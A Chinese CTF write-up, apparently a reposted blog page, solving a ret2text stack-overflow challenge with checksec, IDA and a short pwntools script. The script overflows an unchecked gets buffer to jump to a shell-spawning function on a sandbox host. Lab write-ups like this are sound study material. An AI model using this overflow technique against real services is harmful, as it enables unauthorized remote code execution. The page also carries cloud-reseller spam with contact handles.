PWN做题笔记1

阿里云国内75折回扣微信号：monov8

阿里云国际，腾讯云国际，低至75折。AWS 93折免费开户实名账号代冲值优惠多多微信号：monov8 飞机：@monov6

原题在某个名字被51cto屏蔽了的CTF刷题网站，题目为ret2text

题目属于栈溢出

给出了地址和端口，压缩包中有一个二进制程序pwn

file命令可以看到是64位ELF程序，这里pwn是文件名

PWN做题笔记1_pwn

checksec发现没有开启任何安全措施

PWN做题笔记1_二进制安全_02

程序运行如下：

PWN做题笔记1_pwn_03

ida64反汇编，发现gets输入没有边界检查0x70，存在注入：

PWN做题笔记1_pwn_04

secure函数调用了system返回一个服务器里的shell，因此目标是调用这个函数：

PWN做题笔记1_pwn_05

目标是覆盖tmain存储下一指令的位置，地址偏移除了0x70还要约过存放tmain的ebp的一个单元，即再+8，下一指令覆盖为0x4007B8

因此输入：b'A' * 0x78 + p64(0x4007b8)

同pwntools编写脚本：

from pwn import *
host = 'challenge-ff699f909c1e3503.sandbox.ctfhub.com'
port = 37126

p = connect(host, port)
payload = b'A' * 0x78 + p64(0x4007b8)
p.sendline(payload)
p.interactive()

运行获取了服务器中的shell，ls发现flag文件，cat获取flag

PWN做题笔记1_ctf_06

PWN做题笔记1_ctf_07

这道题很简单，主要是了解pwn是在干啥，以及如何利用pwntools编写脚本

知识点主要是函数栈结构

阿里云国内75折回扣微信号：monov8

阿里云国际，腾讯云国际，低至75折。AWS 93折免费开户实名账号代冲值优惠多多微信号：monov8 飞机：@monov6

返回列表

上一篇：在MySQL 5.7中使用DECLARE语句的注意事项

下一篇：趣解设计模式之《新娘到底叫啥名啊？》

“PWN做题笔记1” 的相关文章

排查＋解决 Java 内存泄漏，最基本的方法，你必须学会！1年前 (2023-02-02)

网页DOM编程方法（API总结与应用）1年前 (2023-02-02)

P1352 没有上司的舞会+P1122 最大子树和（树形DP入门）1年前 (2023-02-02)

既然有MySQL了，为什么还要有MongoDB？1年前 (2023-02-02)

matplotlib+cartopy+geopandas，实现专业地图可视化！1年前 (2023-02-02)

windows11 彻底修改c盘中文用户名1年前 (2023-02-02)

内网穿透你真的了解吗？1年前 (2023-02-02)

Js实现轮盘抽奖功能，一招帮你解决选择困难症1年前 (2023-02-02)

无人驾驶路径规划（一）全局路径规划 - RRT算法原理及实现_全局路径规划1年前 (2023-02-02)

火山引擎 DataTester：0 代码也能实施 A/B 测试的实验平台1年前 (2023-02-02)

PWN做题笔记1

“PWN做题笔记1” 的相关文章

阿里云国际版